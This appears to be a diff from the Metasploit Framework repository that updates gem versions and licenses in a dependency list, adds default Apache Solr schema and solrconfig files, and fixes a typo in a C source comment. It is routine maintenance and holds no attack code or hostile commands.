+dnsruby, 1.72.1, "Apache 2.0"
 docile, 1.4.0, MIT
-domain_name, 0.5.20190701, "Simplified BSD, New BSD, Mozilla Public License 2.0"
+domain_name, 0.6.20240107, "Simplified BSD, New BSD, Mozilla Public License 2.0"
 ed25519, 1.3.0, MIT
 em-http-request, 1.1.7, MIT
 em-socksify, 0.3.2, MIT
 erubi, 1.12.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 6.2.1, MIT
-factory_bot_rails, 6.2.0, MIT
-faker, 3.2.1, MIT
+factory_bot, 6.4.6, MIT
+factory_bot_rails, 6.4.3, MIT
+faker, 3.3.1, MIT
 faraday, 2.7.11, MIT
 faraday-net_http, 3.0.2, MIT
-faraday-retry, 2.2.0, MIT
+faraday-retry, 2.2.1, MIT
 faye-websocket, 0.11.3, "Apache 2.0"
 ffi, 1.16.3, "New BSD"
 filesize, 0.2.0, MIT
@@ -65,80 +66,80 @@ hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
 http-cookie, 1.0.5, MIT
 http_parser.rb, 0.8.0, MIT
 httpclient, 2.8.3, ruby
-i18n, 1.14.1, MIT
-io-console, 0.6.0, "ruby, Simplified BSD"
+i18n, 1.14.4, MIT
+io-console, 0.7.2, "ruby, Simplified BSD"
 irb, 1.7.4, "ruby, Simplified BSD"
 jmespath, 1.6.2, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
-json, 2.6.3, ruby
+json, 2.7.2, ruby
 language_server-protocol, 3.17.0.3, MIT
 little-plugger, 1.1.4, MIT
 logging, 2.3.1, MIT
-loofah, 2.21.3, MIT
+loofah, 2.22.0, MIT
 macaddr, 1.7.2, ruby
 memory_profiler, 1.0.1, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.2, "New BSD"
-metasploit-credential, 6.0.7, "New BSD"
-metasploit-framework, 6.4.3, "New BSD"
+metasploit-credential, 6.0.9, "New BSD"
+metasploit-framework, 6.4.12, "New BSD"
 metasploit-model, 5.0.2, "New BSD"
 metasploit-payloads, 2.0.166, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 6.0.3, "New BSD"
 metasploit_payloads-mettle, 1.0.26, "3-clause (or ""modified"") BSD"
-method_source, 1.0.0, MIT
-mime-types, 3.5.1, MIT
-mime-types-data, 3.2023.1003, MIT
-mini_portile2, 2.8.4, MIT
-minitest, 5.20.0, MIT
+method_source, 1.1.0, MIT
+mime-types, 3.5.2, MIT
+mime-types-data, 3.2024.0305, MIT
+mini_portile2, 2.8.6, MIT
+minitest, 5.22.3, MIT
 mqtt, 0.6.0, MIT
 msgpack, 1.6.1, "Apache 2.0"
 multi_json, 1.15.0, MIT
 mustermann, 3.0.0, MIT
 nessus_rest, 0.1.6, MIT
-net-imap, 0.4.0, "ruby, Simplified BSD"
-net-ldap, 0.18.0, MIT
-net-protocol, 0.2.1, "ruby, Simplified BSD"
-net-smtp, 0.4.0, "ruby, Simplified BSD"
-net-ssh, 7.2.0, MIT
+net-imap, 0.4.11, "ruby, Simplified BSD"
+net-ldap, 0.19.0, MIT
+net-protocol, 0.2.2, "ruby, Simplified BSD"
+net-smtp, 0.5.0, "ruby, Simplified BSD"
+net-ssh, 7.2.3, MIT
 network_interface, 0.0.4, MIT
 nexpose, 7.3.0, "New BSD"
-nio4r, 2.5.9, MIT
-nokogiri, 1.14.5, MIT
-nori, 2.6.0, MIT
+nio4r, 2.7.3, "MIT, Simplified BSD"
+nokogiri, 1.16.5, MIT
+nori, 2.7.0, MIT
 octokit, 4.25.1, MIT
 openssl-ccm, 1.2.3, MIT
 openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 2.0.0, "New BSD"
-parallel, 1.23.0, MIT
-parser, 3.2.2.4, MIT
+parallel, 1.24.0, MIT
+parser, 3.3.0.5, MIT
 patch_finder, 1.0.2, "New BSD"
-pcaprub, 0.13.1, LGPL-2.1
-pdf-reader, 2.11.0, MIT
-pg, 1.5.4, "Simplified BSD"
+pcaprub, 0.13.2, LGPL-2.1
+pdf-reader, 2.12.0, MIT
+pg, 1.5.6, "Simplified BSD"
 pry, 0.14.2, MIT
 pry-byebug, 3.10.1, MIT
-public_suffix, 5.0.3, MIT
-puma, 6.4.0, "New BSD"
-racc, 1.7.1, "ruby, Simplified BSD"
-rack, 2.2.8, MIT
-rack-protection, 3.1.0, MIT
+public_suffix, 5.0.5, MIT
+puma, 6.4.2, "New BSD"
+racc, 1.8.0, "ruby, Simplified BSD"
+rack, 2.2.9, MIT
+rack-protection, 3.2.0, MIT
 rack-test, 2.1.0, MIT
 rails-dom-testing, 2.2.0, MIT
 rails-html-sanitizer, 1.6.0, MIT
-railties, 7.0.8, MIT
+railties, 7.0.8.1, MIT
 rainbow, 3.1.1, MIT
-rake, 13.0.6, MIT
-rasn1, 0.12.1, MIT
+rake, 13.2.1, MIT
+rasn1, 0.13.0, MIT
 rb-readline, 0.5.5, BSD
-recog, 3.1.2, unknown
+recog, 3.1.5, unknown
 redcarpet, 3.6.0, MIT
-regexp_parser, 2.8.1, MIT
-reline, 0.4.1, ruby
+regexp_parser, 2.9.0, MIT
+reline, 0.5.2, ruby
 require_all, 3.0.0, MIT
 rex-arch, 0.1.15, "New BSD"
 rex-bin_tools, 0.1.9, "New BSD"
-rex-core, 0.1.31, "New BSD"
+rex-core, 0.1.32, "New BSD"
 rex-encoder, 0.1.7, "New BSD"
 rex-exploitation, 0.1.39, "New BSD"
 rex-java, 0.1.7, "New BSD"
@@ -146,55 +147,54 @@ rex-mime, 0.1.8, "New BSD"
 rex-nop, 0.1.3, "New BSD"
 rex-ole, 0.1.8, "New BSD"
 rex-powershell, 0.1.99, "New BSD"
-rex-random_identifier, 0.1.11, "New BSD"
+rex-random_identifier, 0.1.12, "New BSD"
 rex-registry, 0.1.5, "New BSD"
 rex-rop_builder, 0.1.5, "New BSD"
 rex-socket, 0.1.57, "New BSD"
 rex-sslscan, 0.1.10, "New BSD"
 rex-struct2, 0.1.4, "New BSD"
-rex-text, 0.2.57, "New BSD"
+rex-text, 0.2.58, "New BSD"
 rex-zip, 0.1.5, "New BSD"
-rexml, 3.2.6, "Simplified BSD"
+rexml, 3.2.8, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.13.0, MIT
 rspec-core, 3.13.0, MIT
 rspec-expectations, 3.13.0, MIT
 rspec-mocks, 3.13.0, MIT
-rspec-rails, 6.0.3, MIT
+rspec-rails, 6.1.2, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.13.0, MIT
-rubocop, 1.56.4, MIT
-rubocop-ast, 1.29.0, MIT
-ruby-macho, 4.0.0, MIT
+rspec-support, 3.13.1, MIT
+rubocop, 1.63.2, MIT
+rubocop-ast, 1.31.2, MIT
+ruby-macho, 4.0.1, MIT
 ruby-mysql, 4.1.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.13.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.3.4, "New BSD"
+ruby_smb, 3.3.8, "New BSD"
 rubyntlm, 0.6.3, MIT
 rubyzip, 2.3.2, "Simplified BSD"
 sawyer, 0.9.2, MIT
 simplecov, 0.18.2, MIT
 simplecov-html, 0.12.3, MIT
-simpleidn, 0.2.1, MIT
-sinatra, 3.1.0, MIT
-sqlite3, 1.6.6, "New BSD"
+simpleidn, 0.2.3, MIT
+sinatra, 3.2.0, MIT
+sqlite3, 1.7.3, "New BSD"
 sshkey, 3.0.0, MIT
 strptime, 0.2.5, "Simplified BSD"
+strscan, 3.1.0, "ruby, Simplified BSD"
 swagger-blocks, 3.0.0, MIT
 systemu, 2.6.5, ruby
-test-prof, 1.2.3, MIT
+test-prof, 1.3.2, MIT
 thin, 1.8.2, "GPL-2.0+, ruby"
-thor, 1.2.2, MIT
+thor, 1.3.1, MIT
 tilt, 2.3.0, MIT
 timecop, 0.9.8, MIT
-timeout, 0.4.0, "ruby, Simplified BSD"
-ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
+timeout, 0.4.1, "ruby, Simplified BSD"
+ttfunk, 1.8.0, "Nonstandard, GPL-2.0-only, GPL-3.0-only"
 tzinfo, 2.0.6, MIT
-tzinfo-data, 1.2023.3, MIT
-unf, 0.1.4, "2-clause BSDL"
-unf_ext, 0.0.8.2, MIT
+tzinfo-data, 1.2024.1, MIT
 unicode-display_width, 2.5.0, MIT
 unix-crypt, 1.3.1, 0BSD
 uuid, 2.3.9, MIT
@@ -208,4 +208,4 @@ winrm, 2.3.6, "Apache 2.0"
 xdr, 3.0.3, "Apache 2.0"
 xmlrpc, 0.3.3, "ruby, Simplified BSD"
 yard, 0.9.36, MIT
-zeitwerk, 2.6.12, MIT
+zeitwerk, 2.6.13, MIT
@@ -0,0 +1,244 @@
+<?xml version="1.0" encoding="UTF-8" ?>
+<schema name="default-config" version="1.6">
+
+    <field name="id" type="string" indexed="true" stored="true" required="true" multiValued="false" />
+    <field name="_version_" type="plong" indexed="false" stored="false"/>
+    <field name="_root_" type="string" indexed="true" stored="false" docValues="false" />
+    <field name="_nest_path_" type="_nest_path_" /><fieldType name="_nest_path_" class="solr.NestPathField" />
+    <field name="_text_" type="text_general" indexed="true" stored="false" multiValued="true"/>
+    <dynamicField name="*_i"  type="pint"    indexed="true"  stored="true"/>
+    <dynamicField name="*_is" type="pints"    indexed="true"  stored="true"/>
+    <dynamicField name="*_s"  type="string"  indexed="true"  stored="true" />
+    <dynamicField name="*_ss" type="strings"  indexed="true"  stored="true"/>
+    <dynamicField name="*_l"  type="plong"   indexed="true"  stored="true"/>
+    <dynamicField name="*_ls" type="plongs"   indexed="true"  stored="true"/>
+    <dynamicField name="*_t" type="text_general" indexed="true" stored="true" multiValued="false"/>
+    <dynamicField name="*_txt" type="text_general" indexed="true" stored="true"/>
+    <dynamicField name="*_b"  type="boolean" indexed="true" stored="true"/>
+    <dynamicField name="*_bs" type="booleans" indexed="true" stored="true"/>
+    <dynamicField name="*_f"  type="pfloat"  indexed="true"  stored="true"/>
+    <dynamicField name="*_fs" type="pfloats"  indexed="true"  stored="true"/>
+    <dynamicField name="*_d"  type="pdouble" indexed="true"  stored="true"/>
+    <dynamicField name="*_ds" type="pdoubles" indexed="true"  stored="true"/>
+    <dynamicField name="random_*" type="random"/>
+    <dynamicField name="ignored_*" type="ignored"/>
+    <dynamicField name="*_str" type="strings" stored="false" docValues="true" indexed="false" useDocValuesAsStored="false"/>
+    <dynamicField name="*_dt"  type="pdate"    indexed="true"  stored="true"/>
+    <dynamicField name="*_dts" type="pdate"    indexed="true"  stored="true" multiValued="true"/>
+    <dynamicField name="*_p"  type="location" indexed="true" stored="true"/>
+    <dynamicField name="*_srpt"  type="location_rpt" indexed="true" stored="true"/>
+    <dynamicField name="*_dpf" type="delimited_payloads_float" indexed="true"  stored="true"/>
+    <dynamicField name="*_dpi" type="delimited_payloads_int" indexed="true"  stored="true"/>
+    <dynamicField name="*_dps" type="delimited_payloads_string" indexed="true"  stored="true"/>
+    <dynamicField name="attr_*" type="text_general" indexed="true" stored="true" multiValued="true"/>
+    <uniqueKey>id</uniqueKey>
+    <fieldType name="string" class="solr.StrField" sortMissingLast="true" docValues="true" />
+    <fieldType name="strings" class="solr.StrField" sortMissingLast="true" multiValued="true" docValues="true" />
+    <fieldType name="boolean" class="solr.BoolField" sortMissingLast="true"/>
+    <fieldType name="booleans" class="solr.BoolField" sortMissingLast="true" multiValued="true"/>
+    <fieldType name="pint" class="solr.IntPointField" docValues="true"/>
+    <fieldType name="pfloat" class="solr.FloatPointField" docValues="true"/>
+    <fieldType name="plong" class="solr.LongPointField" docValues="true"/>
+    <fieldType name="pdouble" class="solr.DoublePointField" docValues="true"/>
+    <fieldType name="pints" class="solr.IntPointField" docValues="true" multiValued="true"/>
+    <fieldType name="pfloats" class="solr.FloatPointField" docValues="true" multiValued="true"/>
+    <fieldType name="plongs" class="solr.LongPointField" docValues="true" multiValued="true"/>
+    <fieldType name="pdoubles" class="solr.DoublePointField" docValues="true" multiValued="true"/>
+    <fieldType name="random" class="solr.RandomSortField" indexed="true"/>
+    <fieldType name="ignored" stored="false" indexed="false" multiValued="true" class="solr.StrField" />
+    <fieldType name="pdate" class="solr.DatePointField" docValues="true"/>
+    <fieldType name="pdates" class="solr.DatePointField" docValues="true" multiValued="true"/>
+    <fieldType name="binary" class="solr.BinaryField"/>
+    <fieldType name="rank" class="solr.RankField"/>
+    <dynamicField name="*_ws" type="text_ws"  indexed="true"  stored="true"/>
+    <fieldType name="text_ws" class="solr.TextField" positionIncrementGap="100">
+      <analyzer>
+        <tokenizer name="whitespace"/>
+      </analyzer>
+    </fieldType>
+    <fieldType name="text_general" class="solr.TextField" positionIncrementGap="100" multiValued="true">
+      <analyzer type="index">
+        <tokenizer name="standard"/>
+        <filter name="stop" ignoreCase="true" words="stopwords.txt" />
+        <filter name="lowercase"/>
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="standard"/>
+        <filter name="stop" ignoreCase="true" words="stopwords.txt" />
+        <filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="true"/>
+        <filter name="lowercase"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_t_sort" type="text_gen_sort" indexed="true" stored="true" multiValued="false"/>
+    <dynamicField name="*_txt_sort" type="text_gen_sort" indexed="true" stored="true"/>
+    <fieldType name="text_gen_sort" class="solr.SortableTextField" positionIncrementGap="100" multiValued="true">
+      <analyzer type="index">
+        <tokenizer name="standard"/>
+        <filter name="stop" ignoreCase="true" words="stopwords.txt" />
+        <filter name="lowercase"/>
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="standard"/>
+        <filter name="stop" ignoreCase="true" words="stopwords.txt" />
+        <filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="true"/>
+        <filter name="lowercase"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_txt_en" type="text_en"  indexed="true"  stored="true"/>
+    <fieldType name="text_en" class="solr.TextField" positionIncrementGap="100">
+      <analyzer type="index">
+        <tokenizer name="standard"/>
+        <filter name="stop"
+                ignoreCase="true"
+                words="lang/stopwords_en.txt"
+        />
+        <filter name="lowercase"/>
+        <filter name="englishPossessive"/>
+        <filter name="keywordMarker" protected="protwords.txt"/>
+        <filter name="porterStem"/>
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="standard"/>
+        <filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="true"/>
+        <filter name="stop"
+                ignoreCase="true"
+                words="lang/stopwords_en.txt"
+        />
+        <filter name="lowercase"/>
+        <filter name="englishPossessive"/>
+        <filter name="keywordMarker" protected="protwords.txt"/>
+        <filter name="porterStem"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_txt_en_split" type="text_en_splitting"  indexed="true"  stored="true"/>
+    <fieldType name="text_en_splitting" class="solr.TextField" positionIncrementGap="100" autoGeneratePhraseQueries="true">
+      <analyzer type="index">
+        <tokenizer name="whitespace"/>
+        <filter name="stop"
+                ignoreCase="true"
+                words="lang/stopwords_en.txt"
+        />
+        <filter name="wordDelimiterGraph" generateWordParts="1" generateNumberParts="1" catenateWords="1" catenateNumbers="1" catenateAll="0" splitOnCaseChange="1"/>
+        <filter name="lowercase"/>
+        <filter name="keywordMarker" protected="protwords.txt"/>
+        <filter name="porterStem"/>
+        <filter name="flattenGraph" />
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="whitespace"/>
+        <filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="true"/>
+        <filter name="stop"
+                ignoreCase="true"
+                words="lang/stopwords_en.txt"
+        />
+        <filter name="wordDelimiterGraph" generateWordParts="1" generateNumberParts="1" catenateWords="0" catenateNumbers="0" catenateAll="0" splitOnCaseChange="1"/>
+        <filter name="lowercase"/>
+        <filter name="keywordMarker" protected="protwords.txt"/>
+        <filter name="porterStem"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_txt_en_split_tight" type="text_en_splitting_tight"  indexed="true"  stored="true"/>
+    <fieldType name="text_en_splitting_tight" class="solr.TextField" positionIncrementGap="100" autoGeneratePhraseQueries="true">
+      <analyzer type="index">
+        <tokenizer name="whitespace"/>
+        <filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="false"/>
+        <filter name="stop" ignoreCase="true" words="lang/stopwords_en.txt"/>
+        <filter name="wordDelimiterGraph" generateWordParts="0" generateNumberParts="0" catenateWords="1" catenateNumbers="1" catenateAll="0"/>
+        <filter name="lowercase"/>
+        <filter name="keywordMarker" protected="protwords.txt"/>
+        <filter name="englishMinimalStem"/>
+        <filter name="removeDuplicates"/>
+        <filter name="flattenGraph" />
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="whitespace"/>
+        <filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="false"/>
+        <filter name="stop" ignoreCase="true" words="lang/stopwords_en.txt"/>
+        <filter name="wordDelimiterGraph" generateWordParts="0" generateNumberParts="0" catenateWords="1" catenateNumbers="1" catenateAll="0"/>
+        <filter name="lowercase"/>
+        <filter name="keywordMarker" protected="protwords.txt"/>
+        <filter name="englishMinimalStem"/>
+        <filter name="removeDuplicates"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_txt_rev" type="text_general_rev"  indexed="true"  stored="true"/>
+    <fieldType name="text_general_rev" class="solr.TextField" positionIncrementGap="100">
+      <analyzer type="index">
+        <tokenizer name="standard"/>
+        <filter name="stop" ignoreCase="true" words="stopwords.txt" />
+        <filter name="lowercase"/>
+        <filter name="reversedWildcard" withOriginal="true"
+                maxPosAsterisk="3" maxPosQuestion="2" maxFractionAsterisk="0.33"/>
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="standard"/>
+        <filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="true"/>
+        <filter name="stop" ignoreCase="true" words="stopwords.txt" />
+        <filter name="lowercase"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_phon_en" type="phonetic_en"  indexed="true"  stored="true"/>
+    <fieldType name="phonetic_en" stored="false" indexed="true" class="solr.TextField" >
+      <analyzer>
+        <tokenizer name="standard"/>
+        <filter name="doubleMetaphone" inject="false"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_s_lower" type="lowercase"  indexed="true"  stored="true"/>
+    <fieldType name="lowercase" class="solr.TextField" positionIncrementGap="100">
+      <analyzer>
+        <tokenizer name="keyword"/>
+        <filter name="lowercase" />
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_descendent_path" type="descendent_path"  indexed="true"  stored="true"/>
+    <fieldType name="descendent_path" class="solr.TextField">
+      <analyzer type="index">
+        <tokenizer name="pathHierarchy" delimiter="/" />
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="keyword" />
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_ancestor_path" type="ancestor_path"  indexed="true"  stored="true"/>
+    <fieldType name="ancestor_path" class="solr.TextField">
+      <analyzer type="index">
+        <tokenizer name="keyword" />
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="pathHierarchy" delimiter="/" />
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_point" type="point"  indexed="true"  stored="true"/>
+    <fieldType name="point" class="solr.PointType" dimension="2" subFieldSuffix="_d"/>
+    <fieldType name="location" class="solr.LatLonPointSpatialField" docValues="true"/>
+    <fieldType name="location_rpt" class="solr.SpatialRecursivePrefixTreeFieldType"
+               geo="true" distErrPct="0.025" maxDistErr="0.001" distanceUnits="kilometers" />
+    <fieldType name="delimited_payloads_float" stored="false" indexed="true" class="solr.TextField">
+      <analyzer>
+        <tokenizer name="whitespace"/>
+        <filter name="delimitedPayload" encoder="float"/>
+      </analyzer>
+    </fieldType>
+    <fieldType name="delimited_payloads_int" stored="false" indexed="true" class="solr.TextField">
+      <analyzer>
+        <tokenizer name="whitespace"/>
+        <filter name="delimitedPayload" encoder="integer"/>
+      </analyzer>
+    </fieldType>
+    <fieldType name="delimited_payloads_string" stored="false" indexed="true" class="solr.TextField">
+      <analyzer>
+        <tokenizer name="whitespace"/>
+        <filter name="delimitedPayload" encoder="identity"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_txt_cjk" type="text_cjk"  indexed="true"  stored="true"/>
+    <fieldType name="text_cjk" class="solr.TextField" positionIncrementGap="100">
+      <analyzer>
+        <tokenizer name="standard"/>
+        <filter name="CJKWidth"/>
+        <filter name="lowercase"/>
+        <filter name="CJKBigram"/>
+      </analyzer>
+    </fieldType>
+</schema>
@@ -0,0 +1,262 @@
+<?xml version="1.0" encoding="UTF-8" ?>
+<config>
+  <luceneMatchVersion>9.0</luceneMatchVersion>
+  <dataDir>${solr.data.dir:}</dataDir>
+  <directoryFactory name="DirectoryFactory"
+                    class="${solr.directoryFactory:solr.NRTCachingDirectoryFactory}"/>
+  <codecFactory class="solr.SchemaCodecFactory"/>
+  <indexConfig>
+    <lockType>${solr.lock.type:native}</lockType>
+  </indexConfig>
+  <updateHandler class="solr.DirectUpdateHandler2">
+
+    <updateLog>
+      <str name="dir">${solr.ulog.dir:}</str>
+      <int name="numVersionBuckets">${solr.ulog.numVersionBuckets:65536}</int>
+    </updateLog>
+
+    <autoCommit>
+      <maxTime>${solr.autoCommit.maxTime:15000}</maxTime>
+      <openSearcher>false</openSearcher>
+    </autoCommit>
+
+    <autoSoftCommit>
+      <maxTime>${solr.autoSoftCommit.maxTime:-1}</maxTime>
+    </autoSoftCommit>
+
+  </updateHandler>
+
+  <query>
+
+    <maxBooleanClauses>${solr.max.booleanClauses:1024}</maxBooleanClauses>
+
+    <filterCache size="512"
+                 initialSize="512"
+                 autowarmCount="0"/>
+    <queryResultCache size="512"
+                      initialSize="512"
+                      autowarmCount="0"/>
+
+    <documentCache size="512"
+                   initialSize="512"
+                   autowarmCount="0"/>
+
+    <cache name="perSegFilter"
+           class="solr.CaffeineCache"
+           size="10"
+           initialSize="0"
+           autowarmCount="10"
+           regenerator="solr.NoOpRegenerator" />
+
+    <enableLazyFieldLoading>true</enableLazyFieldLoading>
+
+    <queryResultWindowSize>20</queryResultWindowSize>
+
+    <queryResultMaxDocsCached>200</queryResultMaxDocsCached>
+
+    <listener event="newSearcher" class="solr.QuerySenderListener">
+      <arr name="queries">
+      </arr>
+    </listener>
+    <listener event="firstSearcher" class="solr.QuerySenderListener">
+      <arr name="queries">
+      </arr>
+    </listener>
+
+    <useColdSearcher>false</useColdSearcher>
+
+  </query>
+
+    <circuitBreakers enabled="true">
+
+  </circuitBreakers>
+
+  <requestDispatcher>
+
+    <httpCaching never304="true" />
+  </requestDispatcher>
+
+  <requestHandler name="/select" class="solr.SearchHandler">
+    <lst name="defaults">
+      <str name="echoParams">explicit</str>
+      <int name="rows">10</int>
+    </lst>
+  </requestHandler>
+  <requestHandler name="/query" class="solr.SearchHandler">
+    <lst name="defaults">
+      <str name="echoParams">explicit</str>
+      <str name="wt">json</str>
+      <str name="indent">true</str>
+    </lst>
+  </requestHandler>
+  <initParams path="/update/**,/query,/select,/spell">
+    <lst name="defaults">
+      <str name="df">_text_</str>
+    </lst>
+  </initParams>
+  <searchComponent name="spellcheck" class="solr.SpellCheckComponent">
+    <str name="queryAnalyzerFieldType">text_general</str>
+    <lst name="spellchecker">
+      <str name="name">default</str>
+      <str name="field">_text_</str>
+      <str name="classname">solr.DirectSolrSpellChecker</str>
+      <str name="distanceMeasure">internal</str>
+      <float name="accuracy">0.5</float>
+      <int name="maxEdits">2</int>
+      <int name="minPrefix">1</int>
+      <int name="maxInspections">5</int>
+      <int name="minQueryLength">4</int>
+      <float name="maxQueryFrequency">0.01</float>
+    </lst>
+  </searchComponent>
+  <requestHandler name="/spell" class="solr.SearchHandler" startup="lazy">
+    <lst name="defaults">
+      <str name="spellcheck.dictionary">default</str>
+      <str name="spellcheck">on</str>
+      <str name="spellcheck.extendedResults">true</str>
+      <str name="spellcheck.count">10</str>
+      <str name="spellcheck.alternativeTermCount">5</str>
+      <str name="spellcheck.maxResultsForSuggest">5</str>
+      <str name="spellcheck.collate">true</str>
+      <str name="spellcheck.collateExtendedResults">true</str>
+      <str name="spellcheck.maxCollationTries">10</str>
+      <str name="spellcheck.maxCollations">5</str>
+    </lst>
+    <arr name="last-components">
+      <str>spellcheck</str>
+    </arr>
+  </requestHandler>
+  <searchComponent class="solr.HighlightComponent" name="highlight">
+    <highlighting>
+      <fragmenter name="gap"
+                  default="true"
+                  class="solr.highlight.GapFragmenter">
+        <lst name="defaults">
+          <int name="hl.fragsize">100</int>
+        </lst>
+      </fragmenter>
+
+      <fragmenter name="regex"
+                  class="solr.highlight.RegexFragmenter">
+        <lst name="defaults">
+          <int name="hl.fragsize">70</int>
+          <float name="hl.regex.slop">0.5</float>
+          <str name="hl.regex.pattern">[-\w ,/\n\&quot;&apos;]{20,200}</str>
+        </lst>
+      </fragmenter>
+      <formatter name="html"
+                 default="true"
+                 class="solr.highlight.HtmlFormatter">
+        <lst name="defaults">
+          <str name="hl.simple.pre"><![CDATA[<em>]]></str>
+          <str name="hl.simple.post"><![CDATA[</em>]]></str>
+        </lst>
+      </formatter>
+      <encoder name="html"
+               class="solr.highlight.HtmlEncoder" />
+
+      <fragListBuilder name="simple"
+                       class="solr.highlight.SimpleFragListBuilder"/>
+
+      <fragListBuilder name="single"
+                       class="solr.highlight.SingleFragListBuilder"/>
+
+      <fragListBuilder name="weighted"
+                       default="true"
+                       class="solr.highlight.WeightedFragListBuilder"/>
+
+      <fragmentsBuilder name="default"
+                        default="true"
+                        class="solr.highlight.ScoreOrderFragmentsBuilder">
+      </fragmentsBuilder>
+
+      <fragmentsBuilder name="colored"
+                        class="solr.highlight.ScoreOrderFragmentsBuilder">
+        <lst name="defaults">
+          <str name="hl.tag.pre"><![CDATA[
+               <b style="background:yellow">,<b style="background:lawgreen">,
+               <b style="background:aquamarine">,<b style="background:magenta">,
+               <b style="background:palegreen">,<b style="background:coral">,
+               <b style="background:wheat">,<b style="background:khaki">,
+               <b style="background:lime">,<b style="background:deepskyblue">]]></str>
+          <str name="hl.tag.post"><![CDATA[</b>]]></str>
+        </lst>
+      </fragmentsBuilder>
+
+      <boundaryScanner name="default"
+                       default="true"
+                       class="solr.highlight.SimpleBoundaryScanner">
+        <lst name="defaults">
+          <str name="hl.bs.maxScan">10</str>
+          <str name="hl.bs.chars">.,!? &#9;&#10;&#13;</str>
+        </lst>
+      </boundaryScanner>
+
+      <boundaryScanner name="breakIterator"
+                       class="solr.highlight.BreakIteratorBoundaryScanner">
+        <lst name="defaults">
+          <str name="hl.bs.type">WORD</str>
+          <str name="hl.bs.language">en</str>
+          <str name="hl.bs.country">US</str>
+        </lst>
+      </boundaryScanner>
+    </highlighting>
+  </searchComponent>
+
+  <updateProcessor class="solr.UUIDUpdateProcessorFactory" name="uuid"/>
+  <updateProcessor class="solr.RemoveBlankFieldUpdateProcessorFactory" name="remove-blank"/>
+  <updateProcessor class="solr.FieldNameMutatingUpdateProcessorFactory" name="field-name-mutating">
+    <str name="pattern">[^\w-\.]</str>
+    <str name="replacement">_</str>
+  </updateProcessor>
+  <updateProcessor class="solr.ParseBooleanFieldUpdateProcessorFactory" name="parse-boolean"/>
+  <updateProcessor class="solr.ParseLongFieldUpdateProcessorFactory" name="parse-long"/>
+  <updateProcessor class="solr.ParseDoubleFieldUpdateProcessorFactory" name="parse-double"/>
+  <updateProcessor class="solr.ParseDateFieldUpdateProcessorFactory" name="parse-date">
+    <arr name="format">
+      <str>yyyy-MM-dd['T'[HH:mm[:ss[.SSS]][z</str>
+      <str>yyyy-MM-dd['T'[HH:mm[:ss[,SSS]][z</str>
+      <str>yyyy-MM-dd HH:mm[:ss[.SSS]][z</str>
+      <str>yyyy-MM-dd HH:mm[:ss[,SSS]][z</str>
+      <str>[EEE, ]dd MMM yyyy HH:mm[:ss] z</str>
+      <str>EEEE, dd-MMM-yy HH:mm:ss z</str>
+      <str>EEE MMM ppd HH:mm:ss [z ]yyyy</str>
+    </arr>
+  </updateProcessor>
+  <updateProcessor class="solr.AddSchemaFieldsUpdateProcessorFactory" name="add-schema-fields">
+    <lst name="typeMapping">
+      <str name="valueClass">java.lang.String</str>
+      <str name="fieldType">text_general</str>
+      <lst name="copyField">
+        <str name="dest">*_str</str>
+        <int name="maxChars">256</int>
+      </lst>
+      <bool name="default">true</bool>
+    </lst>
+    <lst name="typeMapping">
+      <str name="valueClass">java.lang.Boolean</str>
+      <str name="fieldType">booleans</str>
+    </lst>
+    <lst name="typeMapping">
+      <str name="valueClass">java.util.Date</str>
+      <str name="fieldType">pdates</str>
+    </lst>
+    <lst name="typeMapping">
+      <str name="valueClass">java.lang.Long</str>
+      <str name="valueClass">java.lang.Integer</str>
+      <str name="fieldType">plongs</str>
+    </lst>
+    <lst name="typeMapping">
+      <str name="valueClass">java.lang.Number</str>
+      <str name="fieldType">pdoubles</str>
+    </lst>
+  </updateProcessor>
+
+  <updateRequestProcessorChain name="add-unknown-fields-to-the-schema" default="${update.autoCreateFields:true}"
+           processor="uuid,remove-blank,field-name-mutating,parse-boolean,parse-long,parse-double,parse-date,add-schema-fields">
+    <processor class="solr.LogUpdateProcessorFactory"/>
+    <processor class="solr.DistributedUpdateProcessorFactory"/>
+    <processor class="solr.RunUpdateProcessorFactory"/>
+  </updateRequestProcessorChain>
+
+</config>
@@ -553,7 +553,7 @@ void createStackWriteFormatString(
  formatBuffer+=result;
  bufferSize-=result;

-// Write the LABEL 6 more times, thus multiplying the the single
+// Write the LABEL 6 more times, thus multiplying the single
